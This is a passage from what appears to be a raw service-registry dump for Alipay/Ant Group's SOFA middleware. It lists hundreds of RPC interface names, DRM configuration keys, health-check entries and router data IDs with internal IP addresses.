enter.facade.api.GclearingFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.DownTopicReuseAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.facade.XflushCommentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.batchBudgetLinkCompareUserFlow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echannelcenter.common.service.facade.mng.EchannelRouteManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.VerifyLogManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financeha.sdk.core.api.HaOrderService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.access.IssueAccessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.MerchantShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.api.RccenterBasicIndexFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.232.56#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dchainprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zcache.tbase.bankcardTairCache_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:dpcsc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agdscc.common.service.facade.service.credit.AgdsccPCCreditOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_P_O2O#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.custview.facade.agaccesstoken.AgATKIdentificationVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_ZM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.gmcore:name=com.alipay.gmcommon.common.drm.GmCommonDrmValueResource.useLongCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_C_PCCHK_DEDUCT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditcoop.common.service.facade.AccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.spi.RecommendFacade:1.0:peerpayprodRecommendSign@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.ContentLabelGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.98.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.autoinsprod.common.data.AutoCommonConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.counter.api.CounterFacadeV3:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.AccountCancelOperateFacade:1.0:bkcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.apportion.service.PublicityClaimService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.member.facade.ScenePromoUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_INSSCENEMARKETVALUE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iliquidity.biz.manager.cash.BankCashForecastManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.TaskQueryService:1.0:finopencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.NodeOperationApi:1.0:v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.PhysicalTenantDagSubscribeApi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:yebcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipaybuserviceAuthTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.habaseline.common.facade.service.offlinetask.OfflineTaskConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dsoc.service.facade.api.config.center.ReleaseQueryService:1.0:offline_stable@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardRefundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.IndustryPoolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csportal.service.facade.api.TransferQueryProxyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.spi.SecurityProductQueryService:1.0:ifcidentitycloudus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.76.157#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zpaas:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.huanyu.facade.changecategory.ChangeCategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rest.BotEvaluateHttpRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.cif.facade.UserInfoManageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antlink.tuling.common.service.schema.SchemaStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaimportal.common.service.InsClaimScriptQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.dataasset.DataAssetOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.contract.facade.ContractOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@rcreportcenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.insmobile:name=com.alipay.cif.drm.PasswordRevokeSwitch.gesturePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.icashiercore.common.service.facade.api.CashierPayOptionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.queryFixedBankCardListConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.revcore.common.service.facade.api.ownaccount.OwnAccountService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:mif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.biz.manager.ticket.sync.query.ConfigSyncContextQuery:1.0:fcprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_INVOICE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsecu.common.service.facade.api.estimate.FundEstimateQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.plan.PlanMerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.intimateprod.common.service.facade.api.intimatepay.IntimatePayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.admin.MiniAppBundleInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cpcenter.common.service.api.ServiceEventQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstacc.facade.FileVersionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.fixedRedeemSchedulerConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_TESTT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finfoprod.common.service.fsc.facade.FatigueRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.mng.feature.facade.ComplexQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetZsActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmembercenter.common.service.backend.api.MerchantMemberTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.80.30#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ecbill.common.service.loan.OffsetBalanceFacade:1.0:offsetBalanceFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.balanceFundPlanId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@aciamconsole#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.ldcSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasDrmResource.subMsgRecoupMaxTaskNum,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpwm.facade.xb.XbPortfolioDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.basic.articlesync.facade.BasicArticleSyncQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.zprodqueryTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.livetradeprod.service.facade.api.compatible.SoundWaveC2CFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininflux.common.service.facade.rzone.TransactionMapRService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.authcenter.service.facade.SmsCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.metadata.conf.facade.UniDataConfigService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbstaffcenter.common.service.facade.dept.DeptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:assetchain@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.rpc.common.service.facade.transmit.TransmitService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:antsecurity_securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1209#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.certifymng.permlimitDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcontentprod.common.service.facade.api.content.HeadlineProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostCompatibleLogList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilechat.biz.group.rpc.ExitGroupRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.70.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fluxnet.common.service.facade.spi.FluxReceiveService:1.0:bkfmreceipt@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.core.service.promoworkbench.ApproverService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:kbbmsweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.paymentmng.core.common.PaydecisionObFunctionSwitchResorce.paydecisionObSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.portfolio.PortfolioProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.shopcode.service.facade.api.ShopCodeOpenRepairFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.service.facade.api.FootmarkFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.equity.EquityInfoRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.backmanagement.WaterMarkManagementUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.168.203#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kgmng.common.service.facade.schema.KnowledgeEditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.impawn.test.ImpawnAutomatedTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.intclcn.common.service.facade.AssetPriceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.GqcBizSourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepromo.common.service.facade.offlinetaobao.CdpTopicManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.openid.OpenIdGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcheck.biz.service.impl.test.CheckResultMessageListenerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.212.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobileha.core.service.activity.ActivityHaDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.bkassetmore.common.service.facade.api.ArApServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:finasmcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:instfund@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:teamStatusChange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.kernel.CommonCampConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yfdwebTBaseCache.useZoneMng,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.jdbcUrlCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.isdsp.common.service.facade.DsSceneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.247.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.recon.common.service.facade.fund.api.ReconLogConfirmService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kaleido.common.service.facade.goldenfinger.GoldenFingerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.DataSourceModeDrmResourceInterface:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaexprod.comon.service.facade.TwaAdapterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciaasconnectorcore.facade.conn.DatabaseConn:1.0:0000000004@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.scenecube.facade.SchemaService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alibaba.dt.security.facade.access.AccessService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tr-service-enable:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.slaConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.biz.flow.manager.TitleLibraryManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.antfinancial.antchain.cloud.endpoint.facade.BrowserDetailsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.fcbuservice.common.service.facade.DepartmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.SpiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.accorderexprod.common.facade.control.api.MultiTrusteeOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finstore.common.service.facade.fop.api.FinServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finsnsbff:name=com.alipay.finsnsbff.open.seaview.isDowngradeCardPreProcess,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acmeteragecore.common.service.manager.MeterDomainConfigManager#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditbill.facade.common.api.PcreditCommonBillBudgetFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.paramcore.common.service.manage.facade.api.dtemplate.ParmTemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:meshyorg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antlawEndWordTemplateCollBackServiceImpl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_pre_open_account_auth1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.TrailInsureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInOsValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.qconsole.facade.dal.CapacityRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.159.193.143#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finstore.common.service.facade.fop.mng.RecruitFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.kbjob.KbJobUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:CLOUD_CUSTOMER_TASK_ACTION@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.promocore.common.service.facade.CampTriggerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.qianli.common.service.neardata.facade.QianliDbControlFacade:1.0:mobilerelation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoRateNotifyFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.core.service.schedule.ShuffleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linkede.metacenter.rest.EnvRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbatchcore.common.service.facade.kyc.KycProofMoveFacade:1.0:rfmbatchcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetprod.common.facade.AssetDiagnosisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.qaZQueue32#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinquotationprod.common.service.facade.api.MixQuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.dchain.common.facade.api.comparam.InstPbcQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.69.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@zeroxrisk#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitydata:name=com.alipay.securitydata.common.service.hbase.config.HBaseTimeoutConfigResource.configStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antcodebuild@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.socialopen.QualityOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_B_BIZBILLING#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csccmng.facade.CspIdentifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:isuperman@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.codprod.common.service.facade.cod.facade.CodChargeChannelCallBackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.finriskcenter.common.facade.api.guardian.FileEventRelationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchprod.globalsite.facade.api.operation.MerchantTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.costSwitchDate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instpay.settleprod.service.facade.agency.PartnerManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.211.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csshield.service.facade.robot.AnswerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finfocore.FinfoprodDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.zdatabusPayInfoTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.task.ArDivertOperateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecocheck.biz.search.industry.SearchIndustryAppInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.DecisionService:1.0:ant_public@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.44.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openhome.facade.MiniProgramsQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpublish.common.service.facade.CallbackServiceFacade:1.0:opsconfreg@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rccenter.common.report.facade.api.RccenterSrcMetaFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.edeductcenter.common.service.facade.EdeductFacePayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkdepbuss.biz.service.openapi.QueryRysAccountBalanceProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.122.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.clearingcenter.facade.api.ClearingBusinessRuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personalprod.service.facade.relation.TransferIndexManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.84.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinquotationprod.core.service.repository.datacollection.QuoteFragmentRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.pms.common.service.facade.api.MobileClientLasPackageMapper:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:pcreditmarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.feedback.FeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.api.ArddRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.scene.SceneAssetQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.PermissionFacade:1.0:iam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.RedirectFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.checkroute.common.service.checkersdk.service.ChangeRiskDefenseService:1.0:zhimacheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.114.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:change_insight_task@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.QuotationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromomng.common.service.facade.api.campaign.